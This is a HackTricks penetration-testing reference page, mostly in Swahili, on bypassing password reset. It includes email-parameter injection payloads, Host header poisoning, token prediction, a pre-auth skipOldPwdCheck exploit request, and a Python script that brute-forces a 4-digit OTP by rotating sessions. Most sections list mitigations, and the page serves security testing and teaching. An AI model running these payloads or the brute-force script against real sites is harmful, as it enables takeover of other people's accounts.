HackTricksReset/Forgotten Password Bypass
Reading time: 10 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Password Reset Token Leak Via Referrer
- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
- Athari: Inawezekana takeover ya akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
- Utekelezaji: Ili kuhakikisha kama password reset token ina leak kwenye referer header, omba password reset kwa anwani yako ya barua pepe na bonyeza reset link uliopokea. Usibadilishe nenosiri lako mara moja. Badala yake, nenda kwenye tovuti ya mtu wa tatu (kama Facebook au Twitter) huku ukikamata maombi ukitumia Burp Suite. Kagua maombi kuona kama referer header ina password reset token, kwani hili linaweza kufichua taarifa nyeti kwa wadau wa tatu.
- Marejeo:
- HackerOne Report 342693
- HackerOne Report 272379
- Password Reset Token Leak Article
Password Reset Poisoning
- Washambuliaji wanaweza kubadilisha Host header wakati wa maombi ya password reset ili kuelekeza reset link kwenye tovuti hatari.
- Athari: Inaweza kusababisha takeover ya akaunti kwa leaking reset tokens kwa washambuliaji.
- Hatua za Uzuiaji:
- Thibitisha Host header dhidi ya whitelist ya domain zilizoruhusiwa.
- Tumia mbinu salama za server-side kutengeneza absolute URLs.
- Patch: Tumia
$_SERVER['SERVER_NAME']kujenga password reset URLs badala ya$_SERVER['HTTP_HOST']. - Marejeo:
- Acunetix Article on Password Reset Poisoning
Password Reset By Manipulating Email Parameter
Attackers can manipulate the password reset request by adding additional email parameters to divert the reset link.
- Add attacker email as second parameter using &
php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
- Ongeza barua pepe ya mshambuliaji kama kiparameta cha pili ukitumia %20
php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
- Ongeza attacker email kama parameter ya pili ukitumia |
php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
- Ongeza attacker email kama kigezo cha pili ukitumia cc
php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
- Ongeza barua pepe ya attacker kama parameta ya pili ukitumia bcc
php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
Ongeza attacker email kama kigezo cha pili ukitumia ,
php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
- Ongeza attacker email kama parameta ya pili katika json array
php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
- Hatua za Kupunguza Hatari:
- Chambua na thibitisha vigezo vya barua pepe upande wa serveri ipasavyo.
- Tumia prepared statements au parameterized queries ili kuzuia injection attacks.
- Marejeo:
- https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
- https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
- https://twitter.com/HusseiN98D/status/1254888748216655872
Kubadilisha barua pepe na nenosiri ya mtumiaji yeyote kupitia vigezo vya API
- Wavamizi wanaweza kubadilisha vigezo vya barua pepe na nenosiri katika maombi ya API ili kubadilisha nyaraka za kuingia za akaunti.
php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
- Hatua za Kupunguza Hatari:
- Hakikisha ukaguzi mkali wa vigezo na ukaguzi wa uthibitisho.
- Tekeleza logging na ufuatiliaji imara ili kugundua na kujibu shughuli zenye mashaka.
- Marejeo:
- Full Account Takeover via API Parameter Manipulation
Hakuna Rate Limiting: Email Bombing
- Ukosefu wa rate limiting kwenye maombi ya password reset kunaweza kusababisha Email Bombing, kumwaga mtumiaji kwa barua pepe nyingi za reset.
- Hatua za Kupunguza Hatari:
- Tekeleza rate limiting kulingana na IP address au akaunti ya mtumiaji.
- Tumia CAPTCHA challenges ili kuzuia matumizi ya kiotomatiki.
- Marejeo:
- HackerOne Report 280534
Gundua Jinsi Password Reset Token Inavyotengenezwa
- Kuelewa muundo au mbinu nyuma ya token generation kunaweza kusababisha utabiri au brute-forcing ya token. Baadhi ya chaguo:
- Based Timestamp
- Based on the UserID
- Based on email of User
- Based on Firstname and Lastname
- Based on Date of Birth
- Based on Cryptography
- Hatua za Kupunguza Hatari:
- Tumia mbinu za cryptographic zenye nguvu kwa token generation.
- Hakikisha upatikanaji wa randomness na urefu wa kutosha ili kuzuia utabiri.
- Tools: Tumia Burp Sequencer kuchambua randomness ya tokens.
Guessable UUID
- Kama UUIDs (version 1) zinaweza kutabiriwa, wadukuzi wanaweza kuzifanyia brute-force ili kuzalisha reset tokens halali. Angalia:
- Hatua za Kupunguza Hatari:
- Tumia GUID version 4 kwa randomness au tekeleza hatua za ziada za usalama kwa versions nyingine.
- Tools: Tumia guidtool kwa kuchambua na kuzalisha GUIDs.
Response Manipulation: Replace Bad Response With Good One
- Kukandamiza HTTP responses ili kupita ujumbe wa makosa au vizuizi.
- Hatua za Kupunguza Hatari:
- Tekeleza ukaguzi upande wa server ili kuhakikisha uadilifu wa response.
- Tumia njia salama za mawasiliano kama HTTPS ili kuzuia man-in-the-middle attacks.
- Marejeo:
- Critical Bug in Live Bug Bounty Event
Using Expired Token
- Kujaribu kama expired tokens bado zinaweza kutumika kwa password reset.
- Hatua za Kupunguza Hatari:
- Tekeleza sera kali za kuisha kwa token na thibitisha muda wa kuisha upande wa server.
Brute Force Password Reset Token
- Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator ili kupita rate limits za IP.
- Hatua za Kupunguza Hatari:
- Tekeleza rate-limiting imara na mifumo ya kufunga akaunti.
- Fuatilia shughuli zenye mashaka zinazoashiria mashambulizi ya brute-force.
Try Using Your Token
- Kujaribu kama reset token ya mshambuliaji inaweza kutumika pamoja na email ya mwathiriwa.
- Hatua za Kupunguza Hatari:
- Hakikisha token zimefungwa na session ya mtumiaji au sifa nyingine zinazohusiana na mtumiaji.
Session Invalidation in Logout/Password Reset
- Kuhakikisha session zinavunjwa wakati mtumiaji anatoa logout au anarekebisha password yake.
- Hatua za Kupunguza Hatari:
- Tekeleza usimamizi sahihi wa session, kuhakikisha kwamba session zote zinavunjwa baada ya logout au password reset.
Session Invalidation in Logout/Password Reset
- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zinakuwa batili.
- Hatua za Kupunguza Hatari:
- Weka muda wa kumalizika unaofaa kwa reset tokens na utekeleze kwa ukali upande wa server.
OTP rate limit bypass by changing your session
- Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ilikuwa dhaifu (<= 4 digits) basi tunaweza kufanya brute-force ya OTP kwa ufanisi.
- Utekelezaji:
- Omba tu session token mpya baada ya kuzuia na server.
- Mfano code inayo-exploit mdudu huu kwa kukisia OTP kwa nasibu (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya brute-force kwa mfululizo!):
python
# Authentication bypass by password reset
# by coderMohammed
import requests
import random
from time import sleep
headers = {
"User-Agent": "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1",
"Cookie": "PHPSESSID=mrerfjsol4t2ags5ihvvb632ea"
}
url = "http://10.10.12.231:1337/reset_password.php"
logout = "http://10.10.12.231:1337/logout.php"
root = "http://10.10.12.231:1337/"
parms = dict()
ter = 0
phpsessid = ""
print("[+] Starting attack!")
sleep(3)
print("[+] This might take around 5 minutes to finish!")
try:
while True:
parms["recovery_code"] = f"{random.randint(0, 9999):04}" # random number from 0 - 9999 with 4 d
parms["s"] = 164 # not important it only efects the frontend
res = requests.post(url, data=parms, allow_redirects=True, verify=False, headers=headers)
if ter == 8: # follow number of trails
out = requests.get(logout,headers=headers) # log u out
mainp = requests.get(root) # gets another phpssid (token)
cookies = out.cookies # extract the sessionid
phpsessid = cookies.get('PHPSESSID')
headers["cookies"]=f"PHPSESSID={phpsessid}" #update the headers with new session
reset = requests.post(url, data={"email":"tester@hammer.thm"}, allow_redirects=True, verify=False, headers=headers) # sends the email to change the password for
ter = 0 # reset ter so we get a new session after 8 trails
else:
ter += 1
if(len(res.text) == 2292): # this is the length of the page when u get the recovery code correctly (got by testing)
print(len(res.text)) # for debug info
print(phpsessid)
reset_data = { # here we will change the password to somthing new
"new_password": "D37djkamd!",
"confirm_password": "D37djkamd!"
}
reset2 = requests.post(url, data=reset_data, allow_redirects=True, verify=False, headers=headers)
print("[+] Password has been changed to:D37djkamd!")
break
except Exception as e:
print("[+] Attck stopped")
Arbitrary password reset via skipOldPwdCheck (pre-auth)
Baadhi ya utekelezaji huweka wazi action ya password change ambayo inaita rutini ya password-change na skipOldPwdCheck=true na haitathibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/password mpya ndani ya request body, mshambuliaji anaweza kureset akaunti yoyote kabla ya kuthibitishwa (pre-auth).
Vulnerable pattern (PHP):
php
// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);
// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
$body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}
public function displayChangePwd($smarty, $username, $newpwd) {
$current_user = CRMEntity::getInstance('Users');
$current_user->id = $current_user->retrieve_user_id($username);
// ... criteria checks omitted ...
$current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
Ombi la Exploitation (dhana):
http
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
Mikakati ya kupunguza hatari:
- Hakikisha kila mara reset token halali, iliyo na muda maalum na iliyounganishwa na account na session inahitajika kabla ya kubadilisha password.
- Usifichue kabisa skipOldPwdCheck paths kwa watumiaji wasiojathibitishwa; lazima utekeleze authentication kwa mabadiliko ya kawaida ya password na uthibitishe password ya zamani.
- Batilisha session zote zinazoendelea na reset tokens zote baada ya mabadiliko ya password.
Marejeo
- https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token
- https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.